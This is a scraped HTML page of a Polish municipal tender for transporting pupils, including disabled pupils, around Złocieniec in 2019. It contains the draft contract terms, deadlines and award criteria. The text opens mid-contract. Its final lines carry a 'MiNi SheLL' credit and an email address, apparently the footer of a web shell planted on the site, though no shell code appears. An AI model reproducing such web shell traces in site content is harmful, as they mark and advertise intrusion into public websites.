11.Umowę sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze stron. Zadanie częściowe nr 2Projekt Umowa Nr .............. zawarta w dniu ...................................... pomiędzy: Gminą Złocieniec mającą siedzibę w Złocieńcu, ul. Stary Rynek 3, zwaną w dalszej części Umowy ,,ZAMAWIAJĄCYM", za którą działa Burmistrz Złocieńca - Krzysztof Zacharzewski;a........................................................................................................................, zwany dalej ,,Przewoźnikiem".§ 1.1.	Zamawiający powierza a Przewoźnik przyjmuje do wykonania zamówienie pn: ,, Dowóz uczniów niepełnosprawnych do szkół z terenu Gminy Złocieniec w roku 2019,, zgodnie z ofertą Przewoźnika złożoną dnia ....................... r. stanowiącą załącznik do umowy. 2.	Przedmiotem zamówienia jest świadczenie usługi polegającej na przewozie uczniów niepełnosprawnych zgodnie z Załącznikiem do SIWZ z miejscowości: Nowe Worowo ul. Kolonia 34 do Zespołu Placówek Edukacyjno - Terapeutycznych w Drawsku Pomorskim; Dobrosław, Złocieniec i Rzęśnica do Ośrodka Rewalidacyjno Edukacyjno Wychowawczego w Gudowie; Nowe Worowo ul. Kolonia 34 do Zespołu Placówek Edukacyjno - Terapeutycznych w Czaplinku; Nowe Worowo Aleja Wolności 12 do Zespołu Placówek Edukacyjno - Terapeutycznych w Bobrowie; Rzęśnica i Złocieniec do Specjalnego Ośrodka Szkolno Wychowawczego w Szczecinku.3.	Przewoźnik zobowiązuje się do zatrudnienia na podstawie umowy o pracę przez siebie lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia tj. kierowców pojazdów biorących udział w świadczeniu usługi na zasadach określonych w SIWZ stanowiącej integralną część niniejszej umowy.§ 2.Ustala się czas trwania umowy na okres 1.01.2019r. - 31.12.2019r.§ 3.4.	Cena usługi za 1 dzień dowozu na następujących trasach wynosi: Trasa	Cena usługi za 1 dzień dowozu 1.01.-31.12.2019r.1)	Nowe Worowo ul. Kolonia 34- Dobrosław - Złocieniec - Rzęśnica - Gudowo - Drawsko Pom.(trasa bez miesiąca lipca i sierpnia) 2)	Dobrosław -Złocieniec - Rzęśnica - Gudowo (sierpień 2019 r.)	Nowe Worowo ul. Kolonia 34 - Czaplinek	Nowe Worowo Aleja Wolności 12 - Bobrowo	Rzęśnica - Złocieniec -Szczecinek	2. Ceny, o których mowa w ust. 1 zawierają podatek VAT oraz koszty opieki na każdej trasie dowożenia.3.	Zapłata za przewóz następować będzie na podstawie faktur miesięcznych wystawionych przez Przewoźnika zgodnie z poprawnym i kompletnym raportem miesięcznym wg wzoru stanowiącego załącznik do umowy, przelewem bankowym na rachunek nr ........................................... w terminie do 30 dni od otrzymania faktury, przy czym za dzień zapłaty uważa się dzień obciążenia rachunku bankowego Zamawiającego.4. Wyłącza się możliwość cesji wierzytelności wynikającej z niniejszej umowy.5. Burmistrz informuje, że z dniem 1 lipca 2018 r. Gmina przystąpiła do mechanizmu podzielonej płatności w podatku od towarów i usług w związku z czym rachunek bankowy podany przez Przewoźnika do rozliczeń z niniejszej umowy musi być rachunkiem powiązanym z rachunkiem VAT.§ 4.1.	Przewoźnik zobowiązuje się do:1)	zapewnienia pojazdów dostosowanych do przewozu osób niepełnosprawnych , także do przewozu dzieci na wózkach inwalidzkich, wyposażonych w pasy bezpieczeństwa, foteliki, osłony przeciwsłoneczne na szybach, odśnieżane stopnie wejściowe, klimatyzację i ogrzewanie, posiadających polisę OC i NNW dla wszystkich przewożonych osób oraz wymagane przepisami prawa badania techniczne, 2)	zapewnienia opiekunów w czasie przejazdu na każdej trasie, którzy zobowiązani są wprowadzić i wyprowadzić uczniów z pojazdu oraz oddać pod opiekę uprawnionym osobom - rodzicowi ( albo upoważnionej pisemnie przez rodzica osobie) oraz pracownikowi szkoły lub ośrodka, 3)	niełączenia funkcji opiekuna i kierowcy,4)	zapewnienia miejsc siedzących dla wszystkich uczniów,5)	zatrudnienia kierowców posiadających wymagane przepisami prawa uprawnienia, wyposażenia kierowców w identyfikatory oraz telefony komórkowe,6)	do uzgodnienia z dyrektorami i rodzicami uczniów miejsc wsiadania i wysiadania oraz godzin dowozu i odwozu dowożonych uczniów,7)	składania wraz z fakturą za miesiąc, w którym miał miejsce dowóz, miesięcznego raportu wg wzoru stanowiącego załącznik do umowy, 8)	zapewnienia transportu zastępczego w razie awarii pojazdu,2.	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu dzieci, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.§ 5.Przewoźnik zwolniony jest od odpowiedzialności za zawieszenie lub opóźnienie kursu, spowodowane siłą wyższą, w szczególności spowodowane przez gołoledź, nieprzejezdność dróg.§ 6.1.	Przewoźnik zapłaci Zamawiającemu kary umowne:1)	za odstąpienie od umowy, w całości lub w części, z przyczyn leżących po stronie Przewoźnika w wysokości 20 % łącznego wynagrodzenia umownego brutto za ostatni miesiąc,2) w przypadku stwierdzenia braku zatrudnienia na podstawie umowy o pracę osób, o których mowa w §1 ust. 3 lub nieprzedstawienia dowodów potwierdzających ich zatrudnienie - w wysokości 200,00 zł od każdego stwierdzonego przypadku,3) za opóźnienie w dowozie i odwozie uczniów z przyczyn leżących po stronie Przewoźnika w wysokości 20 % łącznego wynagrodzenia umownego brutto za ostatni miesiąc,4) za każdy dzień niewłaściwej realizacji umowy w wysokości 20 % łącznego wynagrodzenia umownego brutto za ostatni miesiąc.2.	Przewoźnik wyraża zgodę na potrącanie kar umownych z przysługującego mu wynagrodzenia.3. Zamawiający zastrzega sobie prawo dochodzenia odszkodowania uzupełniającego ponad kwoty określone w ust. 1w przypadku, gdy szkoda z tytułu niewykonania lub nienależytego wykonania usługi przekroczy kwotę kar umownych. 4. Przewoźnik wyraża zgodę na dokonywanie kontroli przewozu przez Zamawiającego bez uprzedzenia. § 7.1.	Umowa może zostać rozwiązana w każdym czasie za zgodnym porozumieniem stron.2.	Rozwiązanie umowy może nastąpić za jednostronnym 3-miesięcznym wypowiedzeniem, z tym że nie może być rozwiązana w trakcie roku szkolnego.3.	Stronom przysługuje prawo rozwiązania umowy bez zachowania okresu wypowiedzenia w przypadku niewywiązywania się ze zobowiązań przez jedną ze stron.§ 8.Wszelkie zmiany i uzupełnienie treści niniejszej umowy możliwe będę tylko w przypadkach określonych w Rozdziale 16 SIWZ, przy czym ich wprowadzenie wymaga spisania aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. § 9.1.	Wszelkie spory na tle wykonywania postanowień niniejszej umowy strony będą starały się rozwiązać polubownie. W przypadku braku porozumienia spory będzie rozstrzygał sąd właściwy dla siedziby Zamawiającego.4.	Informacja o przetwarzaniu danych osobowych Przewoźnika będącego osobą fizyczną zawarta jest na stronach BIP Zamawiającego.§ 10.W sprawach nieuregulowanych niniejszą umową stosuje się przepisy prawa cywilnego i przewozowego.§ 11.Umowę sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze stron. </span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">3.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 1)	Przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia czynności przewidzianych Umową. 2)	Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia, według polityki kadrowej Wykonawcy. Zmiana osób podanych w ofercie Wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę. 3)	Pozostałe zmiany spowodowane następującymi okolicznościami: a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ, b)	zmiana obowiązującej stawki VAT, c)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, d)	zmiany uzasadnione okolicznościami o których mowa w art. 357[1] §1 Kodeksu cywilnego, e)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ. 4)	Zamawiający dodatkowo przewiduje możliwość dokonania zmian zapisów zawartej umowy w przypadku: a)	wprowadzenie zmian korzystnych dla Zamawiającego, b)	konieczności wprowadzenia zmian uzależnionych od wystąpienia zdarzenia powodującego, iż stosunek zobowiązaniowy nie może istnieć w pierwotnym kształcie, c)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy tj.:o	liczba uczniów w ciągu roku ulegnie zmianie. Jeśli w ciągu roku zgłoszony zostanie dodatkowy uczeń do dowozu na danej trasie , należy zapewnić jego dowóz w cenie ofertowej tej trasy. Wykonawca na wniosek Zamawiającego w trakcie trwania umowy zapewni dowóz uczniów z innych niż wyżej wymienione miejscowości . Zapłata wówczas nastąpi wg stawki jednostkowej za km podanej w ofercie. o	Zamawiający zastrzega sobie prawo zmiany tras dowozu uczniów, ilości dowozu w tygodniu, terminów ich wykonywania oraz liczby uczniów, ze względu na okoliczności , których strony nie mogły przewidzieć w chwili zawarcia umowy a podyktowanych potrzebami zamawiającego wynikającymi z realizacji obowiązku zapewnienia uczniom niepełnosprawnym dowozu do placówek oświatowych.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-20</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dowóz uczniów z terenu gminy Złocieniec do szkół i przedszkoli w roku 2019</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymagania wobec przewoźnika:1)	dowóz wraz z opiekunem, którego zadaniem jest nadzór nad uczniami w czasie dowozu, wchodzenia i wychodzenia uczniów z pojazdu oraz oddanie pod opiekę uczniów pracownikowi szkoły lub przedszkola, opiekunem nie może być kierowca,2)	kierowcy posiadają wymagane przepisami prawa uprawnienia, wyposażeni są w identyfikatory oraz telefony komórkowe, 3)	pojazdy posiadają polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa badania techniczne,4)	miejsca siedzące dla wszystkich uczniów,5)	niełączenie tras np. przewóz z Cieszyna przez Darskowo,6)	zapewnienia transportu zastępczego w razie awarii pojazdu,7)	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu dzieci, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60100000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-01<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wiek pojazdów przeznaczonych do realizacji zamówienia </td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dowóz uczniów niepełnosprawnych z terenu gminy Złocieniec do placówek oświatowych w roku 2019</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Wymagania wobec przewoźnika:1)	pojazdy dostosowane do przewozu osób niepełnosprawnych , także do przewozu dzieci na wózkach inwalidzkich, wyposażone w pasy bezpieczeństwa, foteliki, osłony przeciwsłoneczne na szybach, odśnieżane stopnie wejściowe, klimatyzację i ogrzewanie, posiadające polisę OC i NNW dla wszystkich przewożonych osób oraz wymagane przepisami prawa badania techniczne, 2)	opiekun w czasie przejazdu, który zobowiązany jest wprowadzić i wyprowadzić ucznia z pojazdu oraz przekazać uprawnionym osobom - rodzicowi ( albo upoważnionej pisemnie przez rodzica osobie) oraz pracownikowi szkoły lub ośrodka, funkcji opiekuna nie może pełnić kierowca,3)	miejsca siedzące dla wszystkich uczniów,4)	kierowcy posiadają wymagane przepisami prawa uprawnienia, wyposażeni są w identyfikatory oraz telefony komórkowe,5)	miejsca wsiadania i wysiadania oraz godziny dowozu i odwozu dowożonych uczniów należy uzgodnić z dyrektorami i rodzicami uczniów,6)	wraz z fakturą składaną po danym miesiącu, w którym miał miejsce dowóz, należy złożyć zaświadczenie dyrektora danej szkoły lub placówki, zawierające potwierdzenie realizowania dowozu uprawnionego ucznia w tym miesiącu,7)	zapewnienia transportu zastępczego w razie awarii pojazdu,8)	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu dzieci, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60130000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2019-01-01<br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wiek pojazdów przeznaczonych do realizacji zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com